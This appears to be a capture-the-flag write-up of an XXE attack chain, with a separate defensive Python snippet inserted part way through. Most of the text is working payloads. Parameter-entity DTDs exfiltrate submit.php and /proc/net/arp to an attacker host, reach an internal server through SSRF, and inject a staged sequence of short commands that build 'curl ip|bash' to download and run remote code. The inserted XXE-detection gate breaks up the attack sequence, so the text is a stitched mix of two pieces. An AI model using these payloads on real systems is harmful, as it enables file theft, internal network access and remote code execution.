<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=submit.php">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
Successfully read out submit.php.
Asked Annevi and learned that there is another server on the internal network.
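The DTD above works because the application's XML parser resolves parameter entities and fetches external resources, so the base64-encoded file ends up in an outbound request. As an added example (not code from the writeup), here is a small Python gate a defender could put in front of an XML parser: it scans the raw submission for the indicators this payload relies on (a DOCTYPE, SYSTEM/PUBLIC entities, parameter entities, the php://filter wrapper and an HTTP callback) and rejects the document before it is parsed. The function names and the benign sample document are assumptions; the malicious sample is the DTD fragment shown above.

```python
import re

# Indicators of an out-of-band XXE payload.  Each is a compiled regex
# matched against the raw (unparsed) XML/DTD text.
XXE_PATTERNS = {
    # Any inline DTD at all is suspicious for a data-submission endpoint.
    "doctype": re.compile(r"<!DOCTYPE", re.I),
    # General or parameter entity that points at an external resource.
    "external_entity": re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)", re.I),
    # Parameter entities (<!ENTITY % name ...>) are the building block of blind XXE.
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    # PHP stream wrapper used to base64-encode and (optionally) compress file contents.
    "php_filter": re.compile(r"php://filter", re.I),
    # Entity whose SYSTEM identifier is an HTTP URL: the exfiltration callback.
    "oob_callback": re.compile(r"SYSTEM\s+['\"]https?://", re.I),
}


def xxe_indicators(xml_text: str) -> list[str]:
    """Return the sorted names of all XXE indicators found in the text."""
    return sorted(name for name, rx in XXE_PATTERNS.items() if rx.search(xml_text))


def check_xml_submission(xml_text: str) -> tuple[bool, list[str]]:
    """Gate a submission: (allowed, reasons).

    Reject anything that declares a DOCTYPE or entities.  This complements,
    not replaces, configuring the parser itself not to resolve external
    entities or load external DTDs.
    """
    hits = xxe_indicators(xml_text)
    return (len(hits) == 0, hits)


# Constructed sample: the parameter-entity DTD from the writeup above.
SAMPLE_MALICIOUS = (
    '<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=submit.php">\n'
    '<!ENTITY % int "<!ENTITY % send SYSTEM \'http://ip/%file;\'>">\n'
)

# Constructed sample: an ordinary submission with no DTD (assumed schema).
SAMPLE_BENIGN = '<?xml version="1.0"?><submission><name>alice</name></submission>'


if __name__ == "__main__":
    for label, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        allowed, reasons = check_xml_submission(doc)
        print(f"{label}: allowed={allowed} reasons={reasons}")
```

Because the malicious document declares its parameter entities in an external DTD fetched over HTTP, the gate also needs to see the DTD reference itself; any `<!DOCTYPE ... SYSTEM "http://...">` in the submission trips the `doctype` and `oob_callback` checks. Logging the matched indicator names gives the SOC a ready-made detection signal.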
Modify xxe.dtd:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/proc/net/arp">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
Obtained the internal server's address.
Modify xxe.dtd:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
Modify xxe.dtd:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76/?token=mytoken">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
And then? Then there was no more output.
Suspecting the error was caused by the response being too large, compress it with zlib before reading it.
Modify xxe.dtd:
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#1 >ls\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3els%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#2 ls>_
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=ls%3e_">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#3 >\ \\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#4 >-t\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%2d%74%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#5 >\>\a
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%3e%61">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#6 ls>>_
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%6c%73%3e%3e%5f">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#7 >bash
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%62%61%73%68">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#8 >\|\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%7c%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#9 >ip\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%69%70%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#10 >\ \\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#11 >rl\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%72%6c%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#12 >cu\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%63%75%5c%5c">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#13 sh _
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%5f">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

#14 sh a
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%61">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">